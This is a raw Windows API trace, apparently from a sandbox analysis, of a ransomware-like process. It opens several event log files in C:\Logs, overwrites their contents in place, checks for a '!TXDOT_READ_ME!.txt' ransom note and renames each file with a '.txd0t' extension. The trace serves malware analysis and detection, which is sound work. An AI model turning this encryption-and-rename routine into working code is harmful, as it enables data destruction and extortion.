SetEvent (hEvent=0x414) returned 1 [0088.756] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0088.760] StrCpyW (in: psz1=0x53ef7a0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" [0088.760] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.txd0t" [0088.760] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.txd0t") returned 0 [0088.760] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0088.761] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0088.761] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=69632) returned 1 [0088.761] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.761] WriteFile (in: hFile=0x464, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0088.762] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.762] ReadFile (in: hFile=0x464, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x53ef760, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef760*=0x11000, lpOverlapped=0x0) returned 1 [0088.779] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.780] WriteFile (in: hFile=0x464, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x53ef764, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef764*=0x11000, lpOverlapped=0x0) returned 1 [0088.780] FlushFileBuffers (hFile=0x464) returned 1 [0088.891] GetProcessHeap () returned 0xe30000 [0088.891] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x122) returned 0xed7f88 [0088.891] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" [0088.891] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" [0088.891] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.891] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.891] GetProcessHeap () returned 0xe30000 [0088.891] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0088.891] CloseHandle (hObject=0x464) returned 1 [0088.891] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx.txd0t")) returned 1 [0088.892] SetEvent (hEvent=0x414) returned 1 [0088.892] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0088.894] StrCpyW (in: psz1=0x53ef7a0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" [0088.894] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.txd0t" [0088.894] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.txd0t") returned 0 [0088.894] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0088.895] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0088.896] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=69632) returned 1 [0088.896] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.896] WriteFile (in: hFile=0x464, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0088.897] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.897] ReadFile (in: hFile=0x464, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x53ef760, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef760*=0x11000, lpOverlapped=0x0) returned 1 [0088.899] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.899] WriteFile (in: hFile=0x464, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x53ef764, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef764*=0x11000, lpOverlapped=0x0) returned 1 [0088.900] FlushFileBuffers (hFile=0x464) returned 1 [0089.031] GetProcessHeap () returned 0xe30000 [0089.031] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11e) returned 0xed7f88 [0089.031] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" [0089.031] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned="Microsoft-Windows-HotspotAuth%4Operational.evtx" [0089.031] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.031] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.032] GetProcessHeap () returned 0xe30000 [0089.032] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.032] CloseHandle (hObject=0x464) returned 1 [0089.032] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx.txd0t")) returned 1 [0089.033] SetEvent (hEvent=0x414) returned 1 [0089.034] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0089.034] StrCpyW (in: psz1=0x53ef790, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" [0089.034] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.txd0t" [0089.034] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.txd0t") returned 0 [0089.034] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.034] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0089.035] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=69632) returned 1 [0089.035] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.035] WriteFile (in: hFile=0x464, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0089.036] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.036] ReadFile (in: hFile=0x464, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x53ef750, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef750*=0x11000, lpOverlapped=0x0) returned 1 [0089.038] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.038] WriteFile (in: hFile=0x464, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x53ef754, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef754*=0x11000, lpOverlapped=0x0) returned 1 [0089.038] FlushFileBuffers (hFile=0x464) returned 1 [0089.068] GetProcessHeap () returned 0xe30000 [0089.068] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x130) returned 0xed7f88 [0089.068] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" [0089.068] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" [0089.068] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.068] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.068] GetProcessHeap () returned 0xe30000 [0089.068] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.068] CloseHandle (hObject=0x464) returned 1 [0089.068] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx.txd0t")) returned 1 [0089.069] SetEvent (hEvent=0x414) returned 1 [0089.069] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0089.073] StrCpyW (in: psz1=0x53ef7a0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" [0089.073] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.txd0t" [0089.073] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.txd0t") returned 0 [0089.073] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.073] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0089.073] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=69632) returned 1 [0089.073] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.073] WriteFile (in: hFile=0x464, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0089.075] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.075] ReadFile (in: hFile=0x464, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x53ef760, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef760*=0x11000, lpOverlapped=0x0) returned 1 [0089.077] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.077] WriteFile (in: hFile=0x464, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x53ef764, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef764*=0x11000, lpOverlapped=0x0) returned 1 [0089.077] FlushFileBuffers (hFile=0x464) returned 1 [0089.086] GetProcessHeap () returned 0xe30000 [0089.086] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x126) returned 0xed7f88 [0089.086] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" [0089.086] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" [0089.086] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.086] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.086] GetProcessHeap () returned 0xe30000 [0089.086] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.086] CloseHandle (hObject=0x464) returned 1 [0089.086] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx.txd0t")) returned 1 [0089.095] SetEvent (hEvent=0x414) returned 1 [0089.095] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0089.102] StrCpyW (in: psz1=0x53ef7a0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" [0089.103] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx.txd0t" [0089.103] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx.txd0t") returned 0 [0089.103] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx", dwFileAttributes=0x80) returned 1 [0089.103] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0089.103] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=69632) returned 1 [0089.103] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.104] WriteFile (in: hFile=0x464, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0089.105] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.105] ReadFile (in: hFile=0x464, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x53ef760, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef760*=0x11000, lpOverlapped=0x0) returned 1 [0089.107] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.107] WriteFile (in: hFile=0x464, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x53ef764, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef764*=0x11000, lpOverlapped=0x0) returned 1 [0089.107] FlushFileBuffers (hFile=0x464) returned 1 [0089.188] GetProcessHeap () returned 0xe30000 [0089.188] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x120) returned 0xed7f88 [0089.188] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" [0089.189] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned="Microsoft-Windows-Known Folders API Service.evtx" [0089.189] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.189] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.189] GetProcessHeap () returned 0xe30000 [0089.189] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.189] CloseHandle (hObject=0x464) returned 1 [0089.189] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx.txd0t")) returned 1 [0089.189] SetEvent (hEvent=0x414) returned 1 [0089.189] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0089.192] StrCpyW (in: psz1=0x53ef7a0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" [0089.192] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.txd0t" [0089.192] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.txd0t") returned 0 [0089.192] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.192] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0089.192] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=69632) returned 1 [0089.193] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.193] WriteFile (in: hFile=0x478, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0089.193] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.194] ReadFile (in: hFile=0x478, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x53ef760, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef760*=0x11000, lpOverlapped=0x0) returned 1 [0089.202] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.202] WriteFile (in: hFile=0x478, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x53ef764, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef764*=0x11000, lpOverlapped=0x0) returned 1 [0089.203] FlushFileBuffers (hFile=0x478) returned 1 [0089.252] GetProcessHeap () returned 0xe30000 [0089.252] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11c) returned 0xed7f88 [0089.253] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" [0089.253] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned="Microsoft-Windows-ReadyBoost%4Operational.evtx" [0089.253] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.253] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.253] GetProcessHeap () returned 0xe30000 [0089.253] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.253] CloseHandle (hObject=0x478) returned 1 [0089.253] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx.txd0t")) returned 1 [0089.254] SetEvent (hEvent=0x414) returned 1 [0089.254] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0089.256] StrCpyW (in: psz1=0x53ef7a0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" [0089.256] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.txd0t") 